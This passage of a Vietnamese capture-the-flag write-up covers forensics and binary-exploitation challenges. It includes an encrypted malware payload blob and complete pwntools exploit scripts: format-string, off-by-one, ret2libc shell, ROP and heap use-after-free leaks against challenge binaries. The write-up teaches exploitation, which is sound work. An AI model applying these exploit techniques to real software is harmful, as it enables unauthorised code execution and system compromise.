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";
    return r
}

:)) Nhận diện thuật toán, sau khi đọc 1 hồi mình nhìn ra ngay 2 hàm kia để decode base64 và rc4, mình sẽ decrypt biến r luôn. Quay trở lại con vbs, ta có key rc4 là argv[1] truyền vào file js, chính là đoạn này:

Decrypt thôi:

Tại code sau khi decrypt này, ta thấy luôn flag trong đó, decode ra:

Flag: HTB{m4ld0cs_4r3_g3tt1ng_Tr1cki13r}
It_Has_Begun
credit: Nex0
Đề cho ta 1 file bash. Dễ dàng thấy 2 phần flag trong pcname và đoạn được cho vào crontab:
2: NG5kX3kwdVJfR3IwdU5kISF9
1: tS_u0y_ll1w{BTH
Flag: HTB{w1ll_y0u_St4nd_y0uR_Gr0uNd!!}
Phreaky
credit: Nex0
Đề cấp 1 file pcap, đại khái là nó truyền file bằng cách zip, set password rồi base64 lại. Khá troll vì không đọc được trường :(. Mình code quick script sau để dump data ra:
import os
from base64 import b64decode
os.system('strings phreaky.pcap | grep Password > password')
os.system('tshark -nr phreaky.pcap -Y "smtp && imf" -T fields -e media.type | tr -d "\n" | xxd -r -p > data.txt')
with open("data.txt", "r") as f:
    data = f.readlines()
password = open("password", "r").readlines()
password= [i[42:-1] for i in password]
trigger = 0
seq = ""
j = 0
for i in range(len(data)):
    if len(data[i]) == 77:
        seq += data[i].replace("\n", "")
    else:
        seq += data[i].replace("\n", "")
        print(b64decode(seq))
        with open("temp.zip", "wb") as f:
            print(password[j])
            f.write(b64decode(seq))
        os.system(f'unzip -P "{password[j]}" temp.zip')
        j += 1
        seq = ""

with open("final.pdf", "wb") as f:
    for i in range(1, 16):
        data = open(f"phreaks_plan.pdf.part{i}", "rb").read()
        f.write(data)

Result:

Flag: HTB{Th3Phr3aksReadyT0Att4ck}
Pursue The Tracks
credit: Nex0
Đề cho 1 file mft. Sử dụng tool MFTecmd để parse thành csv:


Files are related to two years, which are those? (for example: 1993,1995)

Dễ thấy 2 năm đó luôn:


Ans: 2023,2024


There are some documents, which is the name of the first file written? (for example: randomname.pdf)


Ans: Final_Annual_Report.xlsx


Which file was deleted? (for example: randomname.pdf)

Ta thấy Marketing_Plan.xlsx có trường Inuse là False, tức là đã bị xóa:


Ans: Marketing_Plan.xlsx


How many of them have been set in Hidden mode? (for example: 43)

Trừ các file hệ thống ra, thì có duy nhất file credentials.txt ở Hidden mode.

Ans: 1


Which is the filename of the important TXT file that was created? (for example: randomname.txt)


Ans: credentials.txt


A file was also copied, which is the new filename? (for example: randomname.pdf)

Check trường IsCopied xem cái nào True, ta được đáp án:

Ans: Financial_Statement_draft.xlsx


Which file was modified after creation? (for example: randomname.pdf)

Ta check time Created với LastRecordChange, chỉ có 1 file là có thời gian LastRecordChange mới hơn.

Ans: Project_Proposal.pdf


What is the name of the file located at record number 45? (for example: randomname.pdf)


Ans: Annual_Report.xlsx


What is the size of the file located at record number 40? (for example: 1337)


Ans: 57344

Flag: HTB{p4rs1ng_mft_1s_v3ry_1mp0rt4nt_s0m3t1m3s}
Urgent
credit: Nex0
Đề cho 1 file EML, kèm 1 attachment html. Ta tiến hành phân tích:
Html chứa unescaped character:

Decode nó ra:

Đại khái là mở powershell tải malware về ngay khi windows onload thôi, flag ngay trong code:
Flag: HTB{4n0th3r_d4y_4n0th3r_ph1shi1ng_4tt3mpT}
Oblique Final
credit: Nex0
Đoạn sau của bài mình solve khá randomly, nên wu này mình có điều chỉnh sau khi đọc official wu của giải 🐸
Đề cho ta 1 file Hiberfil.sys - file lưu thông tin tất tần tật các thứ trên máy ở trạng thái hiện tại khi nó bắt đầu vào mode ngủ đông 💤
Và vì thế nó cũng na ná memdump thôi <("), mình convert qua dạng raw mem trước. Mình sử dụng bản volatility 3 branch build này để lấy thêm 2 plugin hibernation:
https://github.com/forensicxlab/volatility3
Convert:

Sau đó load vào xem pslist, dễ thấy 1 sus proc tên TheGame.exe, cũng phù hợp với mô tả của bài :)) :

Sau khi filescan string grep, ngoài ra cũng có thể dùng dlllist lên proc này, ta thấy rất nhiều dll cùng nằm trong folder chứa exe. Ngoài ra trong đó còn có coreclr.dll, mà dựa theo docs trong repo đã archived của Microsoft, define như này:
CoreCLR is the runtime for .NET Core. It includes the garbage collector, JIT compiler, primitive data types and low-level classes.
Vì thế nên đây là 1 .NET project, vì nó chứa core runtime, JIT compiler,..tự làm tự ăn. Ngoài ra, Coreclr như ta biết ở trên, là "runtime for .NET Core". .NET Core là cross-platform của .NET: https://learn.microsoft.com/en-us/archive/msdn-magazine/2016/april/net-core-net-goes-cross-platform-with-net-core. Thì theo đó, thông thường con exe sẽ là executable của project luôn, tuy nhiên trong cross-platform, nó chỉ là loader cho con dll. Hoặc ta dump cả 2 con ra rồi check file type cũng được :v :

Phân tích .NET bằng DNSpy, tuy nhiên hàm main lại không decompile ra gì được, lỗi. Khi đổi sang Intermediate language, ta thấy 1 mớ dài nop opcode:

Ngoài ra dựa vào hint từ đề bài và từ 1 người bạn, ngoài ra check structure của TheGame.dll, ta cũng có thể thấy ReadyToRun header, mình biết được đây là R2R stomping, nó giấu code bằng cách thay các opcode về nop trước các trình decompile như dnspy, ilspy. Thế thì mình đã làm như thế nào? Mình load PE vào IDA và F5 :v Nó thực hiện xor 2 array, mà khi ta xor xong, sẽ được 1 command có kèm flag.

PWN
Delulu
credit: LucPhan

Check file + checksec + IDA




IDA




BUG:

Lỗi format string : printf((const char *)buf);

Lỗi buffer overflow : read(0, buf, 31uLL);

Có hàm in flag delulu()



Khai thác:

Dùng lỗi format string để thay đổi gtri biến v4[0] = 0x1337babe -> 0x1337beef -> gọi hàm delulu in flag

Nhập buffer ở read rồi dùng ở printf lỗi format string.

Do v4[0] = 0x1337babe nên chỉ cần overwrite 2 byte cuối.



Script:


    from pwn import *

    #p = remote("83.136.252.82",32291)
    p = process('./delulu')

    payload = f'%{0xbeef}c%7$hn'.encode()
    payload += p64(0x00)

    p.sendline(payload)

    p.interactive()

Writing on the wall
credit: LucPhan

Check file + checksec + IDA
  
  

IDA
  
  



BUG:

Lỗi off by one : read(0, buf, 7uLL) khi chỉ khai báo char buf[6]

Có hàm lấy flag open_door



Khai thác:

Debug xem có thể dùng buffer overflow overwrite tới đâu

Trước khi read
  

Sau khi read
  



Sau khi debug, ta thấy phần thừa (1byte) sẽ overwrite byte đầu tiên của biến s2 (s2 dùng so sánh với buf để gọi hàm lấy flag) -> Ý tưởng: làm cho cả buf và s2 đều có byte đầu là NULL để khi strcmp sẽ giống nhau.



Script


    from pwn import *

    #p = remote("94.237.55.42",43749)

    p = process("./chall")
    payload = b'\x00\x41\x41\x41\x41\x41\x00'

    p.sendline(payload)

    p.interactive()

Pet companion
credit: LucPhan

Check file + checksec + IDA
  

IDA
  



BUG:

Lỗi buffer overflow : read(0, buf, 256uLL) trong khi khai báo __int64 buf[8] -> Ý tưởng: ret2libc


Khai thác:

Tính offset để overwrite saved rip:

Nhập buf ở hàm read để xem vị trí buf trên stack
  

Tìm vị trí saved rip trên stack
  
  -> offset = 72byte



Leak libc:

Dùng hàm puts hoặc 1 hàm tương tự in ra địa chỉ 1 hàm trong libc.

Thay đổi rsi thành write@got để in ra địa chỉ libc của write bằng cách gọi write@plt



Lấy shell:

Thay đổi rdi (tham số của hàm system) thành địa chỉ của "/bin/sh"

Gọi hàm system trong libc sau khi đã có địa chỉ cơ sở của libc





Script:


    from pwn import *

    context.binary = exe = ELF("./chall_patched",checksec=False)
    libc = ELF("./libc.so.6",checksec=False)
    ld = ELF("./ld-linux-x86-64.so.2",checksec=False)


    #p = remote('94.237.51.203',59602)
    p = process(exe.path)
    poprsi = 0x0000000000400741
    offset_rip =  72
    poprdi = 0x0000000000400743
    ret = 0x00000000004004de

    ####################### LIBC LEAK ######################

    payload=b'a'*offset_rip
    payload+=p64(poprsi) + p64(exe.got['write']) + p64(0x00)
    payload+=p64(exe.plt['write'])
    payload+=p64(exe.sym['main'])
    p.sendafter(b'status: ',payload)
    p.recvuntil(b"Configuring...\n\n")
    leak = int.from_bytes(p.recv(6),"little")
    print('[+] LEAK:',hex(leak))
    libc.address = leak - libc.sym['write']
    print('[+] LIBC ADDRESS:',hex(libc.address))

    ######################## GET SHELL #####################

    payload2 = b'A'*offset_rip
    payload2 += p64(poprdi) + p64(next(libc.search(b'/bin/sh')))
    payload2 += p64(libc.sym['system'])

    p.sendafter(b'status: ',payload2)

    p.interactive()

Rocket blaster xxx
credit: LucPhan
credit: LucPhan

Check file + checksec + IDA
  

IDA
  
  



BUG:

Lỗi buffer overflow : read(0, buf, 102uLL) khi chỉ khai báo `__int64 buf[4]'

Có hàm lấy flag fill_ammo -> ý tưởng: ret2win



Khai thác:

Tính offset để overwrite saved rip

Nhập buf ở hàm read để xem vị trí buf trên stack
  

Tìm vị trí saved rip trên stack
  






        -> offset = 40byte

Lấy địa chỉ của hàm fill_ammo

Tuy nhiên, ở hàm fill_ammo vẫn cần phải thỏa mãn 1 số điều kiện để đọc được flag:

Challenge bắt chúng ta phải làm cho tham số: a1,a2,a3 lần lượt bằng 0xdeadbeef, 0xdeadbabe, 0xdead1337.

Kiểm tra mã assembly của fill_ammo:
  
  

Hàm fill_ammo thực hiện so sánh rax với các vùng nhớ. Ta thấy các vùng nhớ này được điều khiển bởi các thanh ghi rdi, rsi, rdx. -> Dùng ROP để thay đổi giá trị các thanh ghi -> thay đổi các vùng nhớ này





Script

    from pwn import *

    #p = remote('94.237.53.53',37903)
    p = process("./chall")
    poprdi = 0x000000000040159f
    poprsi = 0x000000000040159d
    poprdx = 0x000000000040159b

    win = 0x00000000004012fd
    payload=b'a'*(40-8)
    payload+=p64(0x0000000000405500)
    payload+=p64(poprdi)+p64(0xDEADBEEF)
    payload+=p64(poprsi)+p64(0xDEADBABE)
    payload+=p64(poprdx)+p64(0xDEAD1337)
    payload+=p64(win)

    p.sendlineafter(b'>> ',payload)

    p.interactive()

Sound of silence
credit: LucPhan

Check file + checksec + IDA
  

IDA
  



BUG:

Lỗi buffer overflow : return gets(v4, argv) - hàm gets() không kiểm tra số lượng byte nhập vào.


Khai thác:

Debug chương trình:

Chương trình mov rdi, rax

Sau khi gets() : chương trình sẽ đưa địa chỉ của buf vào rax

Chương trình trước khi gọi hàm system() : có lệnh mov rdi, rax



Hướng khai thác: ta sẽ nhập chuỗi "/bin/sh" vào v4 -> overwrite saved RIP thành địa chỉ mov rdi, rax

Tính offset để overwrite saved RIP

Nhập v4 và xem địa chỉ trên stack:
  

Dùng ở lệnh ret và xem địa chỉ saved RIP:
  






        -> offset = 32

Tuy nhiên, trong quá trình thực hiện hàm system() sẽ gặp lỗi SIGSEGV: Lỗi này xảy ra khi ngăn xếp chưa được căn chỉnh 16 byte trước khi gọi hàm system()

movaps : https://c9x.me/x86/html/file_module_x86_id_180.html

Nguyên nhân: https://stackoverflow.com/questions/54393105/libcs-system-when-the-stack-pointer-is-not-16-padded-causes-segmentation-faul
  

Để giải quyết lỗi này, chúng ta chỉ cần thêm 1 số lệnh ret để trước khi quay trở lại mov rdi, rax





Script

    from pwn import *

    exe = ELF("./chall_patched",checksec=False)
    libc = ELF("./libc.so.6",checksec=False)
    ld = ELF("./ld-linux-x86-64.so.2",checksec=False)

    context.binary = exe
    #p = remote('94.237.54.30',42921)
    p = process(exe.path)
    mov_rdi_rax = 0x0000000000401169
    ret = 0x000000000040101a
    payload=p64(0x0068732f6e69622f)
    payload+=b'\x00'*32
    payload += p64(ret)
    payload += p64(ret)
    payload+=p64(mov_rdi_rax)

    p.sendline(payload)
    p.interactive()

Deathnote
credit: Naooooooooooooo
Đầu tiên ở chương trình sẽ có 1 mảng gốm 10 entries

Sau đó là 1 vòng lặp vô hạn vs các option


Hàm add


Nó chỉ đơn giản là chọn size và index trong entries để set
Index không có out òf bound và size bị giới hạn trong khoảng 1 đến 0x80
Ở đây ta thấy nó ko khởi tạo giá trị khi malloc nên sẽ còn xót lại những giá trị rác nên có thể dùng để leak

Hàm show


Chỉ đơn giản là in dữ liệu của 1 entry
Hàm delete

Ở đây ta thấy nó free rồi nhưng mà ko clear giá trị trong entries nên ở đây ta có bug use after free
Có 1 lựa chọn nữa khi chúng ta nhập option *

Nó sẽ gọi hàm mà entries[0] trỏ vào và tham số là entries[1], vậy nếu entries[0] chứa system còn entries[1] chứa '/bin/sh thì ta thắng.
Exploit
Ở đây mk free 8 chunks để làm đầy tcache rồi chúng ta sẽ có libc
for i in range(9):
    add(0x80, i, b'A')
for i in range(8):
    delete(i)
show(7)
p.recvuntil(b'Page content: ')
leak = p.recvline()[:-1]
leak = int.from_bytes(leak, byteorder='little')
print('leak: ', hex(leak))
libc.address = leak - 2206944
print('libc: ', hex(libc.address))

Như vậy thì chỉ cần tạo entries[0] vs entries[1] nữa là xong
from pwn import *

sla = lambda delim, data: p.sendlineafter(delim, data)
sa = lambda delim, data: p.sendafter(delim, data)

elf = context.binary = ELF('deathnote')
libc = ELF('./glibc/libc.so.6')

def add(size, idx, content):
    sla(b'entry', b'1')
    sla(b'request', str(size).encode())
    sla(b'Page', str(idx).encode())
    sa(b'victim:', content)
def show(idx):
    sla(b'entry', b'3')
    sla(b'Page', str(idx).encode())
def delete(idx):
    sla(b'entry', b'2')
    sla(b'Page', str(idx).encode())
def deobfuscate(val):
    mask = 0xfff << 52
    while mask:
        v = val & mask
        val ^= (v >> 12)
        mask >>= 12
    return val



#context.log_level = 'debug'

#p = process()
p = remote('94.237.58.211', 55260)
#gdb.attach(p, gdbscript='''
#           b show
#           b _
#           c''')

add(0x10, 0, b'A')
add(0x10, 1, b'A')
delete(0)
delete(1)
show(1)
p.recvuntil(b'Page content: ')
leak = p.recvline()[:-1]
leak = int.from_bytes(leak, byteorder='little')
leak = deobfuscate(leak)
print('leak: ', hex(leak))
heap = leak - 1712
print('heap: ', hex(heap))
for i in range(9):
    add(0x80, i, b'A')
for i in range(8):
    delete(i)
show(7)
p.recvuntil(b'Page content: ')
leak = p.recvline()[:-1]
leak = int.from_bytes(leak, byteorder='little')
print('leak: ', hex(leak))
libc.address = leak - 2206944
